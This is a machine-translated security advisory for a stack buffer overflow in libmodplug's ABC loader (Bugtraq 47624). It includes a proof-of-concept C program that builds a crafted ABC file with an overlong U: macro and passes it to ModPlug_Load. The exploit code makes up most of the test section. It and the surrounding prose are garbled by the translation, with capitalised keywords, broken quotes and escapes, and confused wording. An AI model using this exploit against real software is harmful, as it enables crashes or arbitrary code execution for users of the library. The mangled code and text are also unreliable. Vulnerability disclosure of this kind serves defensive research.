Libmodplug "load_abc.cpp" Remote Stack Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Libmodplug 0.8.8 2
Libmodplug 0.8.8 1
Libmodplug 0.8.7
Libmodplug 0.8.7
Libmodplug 0.8.6
Libmodplug 0.8.4
Libmodplug 0.8
Description:
--------------------------------------------------------------------------------
Bugtraq id: 47624

Libmodplug is an open-source function library used to play mod music formats.

The implementation of libmodplug "load_abc.cpp" has the remote stack buffer overflow vulnerability. Remote attackers can exploit this vulnerability to execute arbitrary code with the application permission of the affected database, resulting in DOS.

This vulnerability is caused by a boundary error in the src/load_abc.cpp "abc_new_macro ()" and "abc_new_umacro ()" functions. It induces the user to open a specially crafted ABC file to cause stack buffer overflow.

<* Source: epiphant
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Epiphant () provides the following test methods:

# Include <libmodplug/modplug. h>
# Include <stdio. h>
# Include <string. h>

/*
Libmodplug <= 0.8.8.2. abc stack-based buffer overflow poc

Http://modplug-xmms.sourceforge.net/

By: epiphant

This exploits one of multiple overflows in load_abc.cpp lol

Vlc media player uses libmodplug

Greets: defrost, babi, ming_wisher, emel1a, a. v., krs

Date: 28 then l 2011

Tested on: CentOS 5.6
*/

Int main (void)
{
Char test [512] = "X: 1 \ nU :";
Unsigned int I;

I = strlen (test );
While (I <278)
Test [I ++] = 'q ';
Test [I ++] = '1' + 32;
Test [I ++] = '3 ';
Test [I ++] = '3 ';
Test [I ++] = '4 ';
While (I <286)
Test [I ++] = 'a ';
Test [I ++] = '\ n ';
Test [I] = '\ 0 ';

Strcat (test, "T: Here Without You (Transcribed by: Bungee) \ n ");
Strcat (test, "Z: 3 Doors Down \ n ");
Strcat (test, "L: 1/4 \ n ");
Strcat (test, "Q: 108 \ n ");
Strcat (test, "K: C \ n ");
Strcat (test, "[, 3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8] \ n ");

I = strlen (test );
ModPlug_Load (test, I );

Return 0;
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Libmodplug
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://modplug-xmms.sourceforge.net/